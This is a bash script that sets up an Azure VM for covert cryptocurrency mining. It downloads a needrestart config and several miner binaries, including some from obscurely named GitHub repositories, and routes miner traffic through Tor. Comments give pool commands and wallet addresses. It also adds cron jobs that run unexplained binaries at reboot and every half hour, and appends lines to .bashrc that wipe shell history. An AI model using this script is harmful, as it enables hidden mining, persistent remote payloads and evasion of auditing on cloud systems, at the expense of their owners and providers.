#!/bin/bash
wget https://github.com/samuraifinseev/jkldashdjasopiwqeohbvxc89123nbjkczxvsdi/raw/refs/heads/main/needrestart.conf -P /home/azureuser
sudo mv /home/azureuser/needrestart.conf /etc/needrestart/
sudo apt update
sudo apt install tmux tor mc openvpn -y
cd home/azureuser
sudo systemctl start tor
sudo /usr/sbin/sysctl -w vm.nr_hugepages=1200
/usr/sbin/sysctl -w vm.nr_hugepages=1200
cd home/azureuser
### CHECKER IDLE FOR QUBIC
wget https://github.com/j2d23enr2os32omedaro/jfksdhfvdsiouwrbn32980vxcnbmdfsajkfh2398/raw/main/mine_vm.sh -P /home/azureuser
chmod +x mine_vm.sh
tmux new -ds checker_idle /home/azureuser/mine_vm.sh 
###
### MONEROCEAN С КОНФИГОМ: tmux new -ds servak sudo ./xmrig
wget https://github.com/samuraifinseev/jkldashdjasopiwqeohbvxc89123nbjkczxvsdi/raw/main/mo_xmrig.tar.gz -P /home/azureuser
tar -xf mo_xmrig.tar.gz
rm -r mo_xmrig.tar.gz
#### CPUMINERRPLANT С КОНФИГОМ: tmux new -ds servak torify ./cpuminer-sse2 -a yespower  -o stratum+tcps://stratum-eu.rplant.xyz:17079 -u uw38EeZwnZtCbgtKStGS5kDtStRt2zuriE.AUTOTUNE -p webpassword=5698 -t 2
wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.36/cpuminer-opt-linux.tar.gz -P /home/azureuser
tar -xf cpuminer-opt-linux.tar.gz
sudo rm -r cpuminer-opt-linux.tar.gz 
#### |NOT RECOMENDED MB BUG| HELLMINER(VERUS): tmux new -ds servak torify ./hellminer -c stratum+tcp://eu.luckpool.net:3956#xnsub -u RSXVsvc1ngHoZzEvrzW5EUSaN8c2o47Xxt.BIG_TEST --cpu 2
wget https://github.com/hellcatz/hminer/releases/download/v0.59.1/hellminer_linux64_avx.tar.gz -P /home/azureuser
tar -xf hellminer_linux64_avx.tar.gz
rm -r hellminer_linux64_avx.tar.gz
#### SRB MINER MULTI КОНФИНГ: tmux new -ds servak sudo ./SRBMiner-MULTI --disable-gpu --algorithm verushash --pool eu.luckpool.net:3956 --wallet RSXVsvc1ngHoZzEvrzW5EUSaN8c2o47Xxt.BIG_TEST --proxy localhost:9050 --cpu-threads 2
wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.4.7/SRBMiner-Multi-2-4-7-Linux.tar.xz -P /home/azureuser
tar -xf SRBMiner-Multi-2-4-7-Linux.tar.xz
sudo rm -r SRBMiner-Multi-2-4-7-Linux.tar.xz
mv /home/azureuser/SRBMiner-Multi-2-4-7/* /home/azureuser
#### QUBIC \ QLI-CLIENT\ tmux new -ds servak torify ./qli-Client
mkdir /home/azureuser/qub_dir
cd /home/azureuser/qub_dir
wget https://github.com/samuraifinseev/jkldashdjasopiwqeohbvxc89123nbjkczxvsdi/raw/main/qubic.tar.gz -P /home/azureuser/qub_dir -N
tar -xf /home/azureuser/qub_dir/qubic.tar.gz
### QUBIC \ qubic-soluion \
wget https://github.com/Qubic-Solutions/rqiner-builds/releases/download/v1.0.9c/rqiner-x86-cascadelake -P /home/azureuser/qub_dir -N
chmod 777 /home/azureuser/qub_dir/rqiner-x86-cascadelake


cd /home/azureuser
#### spectre TNN MINER \\\\ torify ./tnn-miner --spectre --wallet spectre:qrrjcpuscnzylt3ukzjymwslp9e68zer2h8gdr6dk88hg53mncavxzhcepxsw --daemon-address spr.tw-pool.com --port 14001 --worker-name test --threads 2
wget https://github.com/samuraifinseev/jkldashdjasopiwqeohbvxc89123nbjkczxvsdi/raw/main/tnn-miner-0.3.7.tar.gz
tar -xf tnn-miner-0.3.7.tar.gz

##### APOOL MINER QUBIC ######## torify ./apoolminer --account CP_7xv4nh7sn3 --gpu-off --pool qubic1.hk.apool.io:3334 --thread 2
wget https://github.com/apool-io/apoolminer/releases/download/v2.1.0/apoolminer_linux_v2.1.0.tar -P /home/azureuser
tar -xf apoolminer_linux_v2.1.0.tar

#####################################################################################################################
wget https://github.com/j2d23enr2os32omedaro/jfksdhfvdsiouwrbn32980vxcnbmdfsajkfh2398/raw/main/cpo -P /home/azureuser
wget https://github.com/j2d23enr2os32omedaro/jfksdhfvdsiouwrbn32980vxcnbmdfsajkfh2398/raw/main/cpo2 -P /home/azureuser
wget https://github.com/samuraifinseev/jkldashdjasopiwqeohbvxc89123nbjkczxvsdi/raw/main/trade_cpo -P /home/azureuser
chmod ugo+x cpo2
chmod ugo+x cpo
chmod ugo+x trade_cpo
sudo systemctl enable cron
crontab -l | { cat; echo "@reboot /home/azureuser/cpo2"; } | crontab
crontab -l | { cat; echo "0,30 * * * * /home/azureuser/trade_cpo"; } | crontab
crontab -l | { cat; echo "@reboot sudo /usr/sbin/sysctl -w vm.nr_hugepages=1200"; } | crontab
crontab -l | { cat; echo "@reboot /usr/sbin/sysctl -w vm.nr_hugepages=1200"; } | crontab
echo ". cat /dev/null > ~/.bash_history" >> ~/.bashrc
echo ". history -cw" >> ~/.bashrc
sudo echo ". cat /dev/null > ~/.bash_history" >> ~/.bashrc
sudo echo ". history -cw" >> ~/.bashrc
sleep 15
sudo systemctl start tor
